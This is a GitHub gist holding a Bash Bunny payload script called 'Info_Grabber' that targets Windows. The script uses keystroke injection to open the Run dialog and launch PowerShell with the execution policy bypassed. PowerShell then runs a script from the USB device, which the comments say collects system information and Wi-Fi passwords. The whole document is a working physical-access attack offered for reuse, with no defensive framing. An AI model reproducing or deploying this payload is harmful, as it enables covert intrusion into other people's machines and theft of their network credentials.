-
-
Save hink/a8b57d16234042e5adc0182e5e1779c7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Title: Info_Grabber | |
# Author: Simen Kjeserud | |
# Version: 1.0 | |
# Target: Windows | |
# Creds: Hak5Darren for inspiration | |
# | |
# Executes run.ps1 which executes scripts that gets you information about | |
# the computer running and will also get wifi passwords | |
LED R B 100 | |
ATTACKMODE HID STORAGE | |
GET SWITCH_POSITION | |
# Set your language here | |
QUACK SET_LANGUAGE no | |
QUACK GUI r | |
QUACK DELAY 200 | |
# Open run and run the run.ps1 script in the Bashbunny | |
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" | |
QUACK ENTER | |
LED G | |
#Green means good to go |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment